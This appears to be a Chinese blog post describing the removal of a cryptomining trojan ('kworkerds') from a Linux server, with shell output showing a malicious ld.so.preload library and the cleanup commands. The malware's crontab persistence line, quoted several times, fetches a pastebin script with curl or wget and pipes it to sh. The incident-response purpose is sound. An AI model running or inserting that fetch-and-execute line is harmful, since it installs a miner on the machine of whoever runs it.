雲盾態勢感知系統檢測到您的服務器出現了緊急安全事件：挖礦木馬

時間 2019-12-20

原文原文鏈接

問題描述：收到阿里雲的報警通知

登陸服務器查看進程：未發現有進程佔用CPU太高的現象

查看/etc/ld.so.preload文件，裏面鏈接到/usr/local/lib/libdns.so

[root@SJ-pre-release ~]# cat /etc/ld.so.preload
/usr/local/lib/libdns.so

查看/usr/local/lib/路徑，看看是否有libdns.so文件

查看定時任務,發現存在一個陌生的定時任務，

[root@SJ-pre-release ~]# crontab -l
*/23 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh

解決辦法：

###清除/etc/ld.so.preload的內容
    [root@SJ-pre-release ~]# echo "" > /etc/ld.so.preload
   ### 刪除/usr/local/lib/lib/libdns.so文件
    [root@SJ-pre-release ~]# rm -rf /usr/local/lib/lib/libdns.so
   ### 刪除定時任務
    [root@SJ-pre-release ~]# cat /var/spool/cron/root
    */23 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
    ##
    [root@SJ-pre-release ~]# rm -rf /var/spool/cron/root
    [root@SJ-pre-release ~]# cat /var/spool/cron/crontabs/root
    */31 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
    ##
    [root@SJ-pre-release ~]# rm -rf /var/spool/cron/crontabs/root

再次查看進程，發現有一個kworkerds，進程號爲14711的進程，CPU佔有率高達397.5%

[root@SJ-pre-release ~]# top
top - 09:12:50 up 229 days, 21:41,  9 users,  load average: 4.23, 4.12, 4.08
Tasks: 145 total,   1 running, 144 sleeping,   0 stopped,   0 zombie
%Cpu(s): 99.8 us,  0.2 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem:   8011936 total,  7647536 used,   364400 free,   303504 buffers
KiB Swap:        0 total,        0 used,        0 free.   301404 cached Mem

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
14711 root      20   0  566768  35644    756 S 397.5  0.4   1719:53 kworkerds
11701 root      20   0 4730228 797664  12764 S   1.7 10.0 536:07.20 java
18094 root      20   0       0      0      0 S   0.3  0.0   0:00.05 kworker/3:2
18155 root      20   0  123696   1684   1156 R   0.3  0.0   0:00.08 top
22408 root      20   0 1281204 193204   5124 S   0.3  2.4  77:45.91 node

使用ps命令查看該進程的路徑

[root@SJ-pre-release ~]# ps -aux | grep 14711
root     14711  397  0.4 566768 35644 ?        Sl   02:00 1720:38 /tmp/kworkerds
root     18157  0.0  0.0 112644   984 pts/1    S+   09:13   0:00 grep --color=auto 14711
先刪掉進程，再刪除文件
[root@SJ-pre-release ~]# kill -9 14711
[root@SJ-pre-release ~]# ps -aux | grep 14711
root     18175  0.0  0.0 112644   984 pts/1    S+   09:13   0:00 grep --color=auto 14711
[root@SJ-pre-release ~]# rm -rf /tmp/kworkerds

問題解決java